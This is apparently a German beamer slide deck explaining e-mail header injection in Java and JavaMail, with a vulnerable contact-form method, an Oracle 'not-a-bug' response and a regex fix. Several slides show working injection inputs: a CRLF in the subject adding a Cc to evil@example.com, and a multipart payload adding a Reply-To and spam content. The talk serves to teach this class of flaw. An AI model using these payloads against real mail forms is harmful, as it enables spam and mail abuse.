% Filename: tpp.tex % Purpose: template file for tpp latex export % Authors: (c) Andreas Gredler, Michael Prokop http://grml.org/ % License: This file is licensed under the GPL v2. % Latest change: Fre Apr 15 20:34:37 CEST 2005 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \documentclass{beamer} \mode { \usetheme{Montpellier} \setbeamercovered{transparent} } \usepackage[german]{babel} \usepackage{umlaut} \usepackage[latin1]{inputenc} \usepackage{times} \usepackage[T1]{fontenc} \title[ E-Mail Header Injection]{ E-Mail Header Injection} \begin{document} \begin{frame}[fragile] \begin{verbatim} \author{Steve Ulrich, Micromata GmbH} \end{verbatim} \end{frame} \section{Just Another Injection} \begin{frame}[fragile] \begin{verbatim} \title[Die Inspiration]{Die Inspiration} public void sendContactForm(String subject, String content) { String template = "From: "+user.getEmail()+"\n"+ "To: "+contactEmail +"\n"+ "Subject: "+subject+"\n"+ "\n"+ content; sendEmail(template); } \title[Das Problem]{Das Problem} http://xxx/sendContactForm ?subject=sometext%0ACc%3A+evil%40example.com &text=sometext \title[Das Resultat]{Das Resultat} From: user@example.com To: contact@example.com Subject: sometext Cc: evil@example.com sometext \title[Also nur eine Injection Lücke?]{Also nur eine Injection Lücke?} Nutzen wir also eine API (JavaMail), die wird uns schon schützen! Letzte Worte eines Entwicklers \title[JavaMail to the R...]{JavaMail to the R...} String subject = "sometext\nevil@example.com"; final MimeMessage msg = .. msg.setSender(new InternetAddress(user.getEmail())); msg.setRecipient(RecipientType.TO, new InternetAddress(contactEmail)); msg.setSubject(subject); msg.setText("BlahBlah"); \title[JavaMail to the R...WTF]{JavaMail to the R...WTF} From: user@example.com To: contact@example.com Subject: sometext Cc: evil@example.com BlahBlah \title[Ein Bug?]{Ein Bug?} Es exitiert ein Issue: CSNC-2014-001 The assessment from our engineering team is that this is not a bug in JavaMail API. The application is responsible to perform some input validation. In this particular case, the application is responsible for ensuring that the subject string does not contain any line breaks. The code demonstrated the issue is not an Oracle sample. Therefore, we are closing the issue as not-a-bug. Oracle \title[Validierung]{Validierung} Eine Grundregel bei Input Validation ist "Versuche es nicht selbst". Keine Regel ohne Ausnahme subject.replaceAll("[\\n\\r]+", " "); \title[Spaß mit Header Injection]{Spaß mit Header Injection} String subject = "Test" // This will be the subject + "\n" + "\nEvil content" From: user@example.com To: contact@example.com Subject: sometext Evil Content BlahBlah \title[Multipart injection]{Multipart injection} String subject = "Cheap Viagra" + "\nReply-To:attacker@example.com" // Man bittet um Antwort + "\nMIME-Version: 1.0" // Content-Header + "\nContent-Type: multipart/mixed; boundary=frontier" + "\n" // Empty line separates the Content! + "\n--frontier" + "\nContent-Type: text/plain\n" // Oder Fancy HTML? + "\nBilliges Viagra" // So günstig + "\n--frontier" + "\nContent-Type: text/nonsense" // jetzt den alten Content raus + "\n" // Empty line separates the Content! \end{verbatim} \end{frame} \end{document} %%%%% END OF FILE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%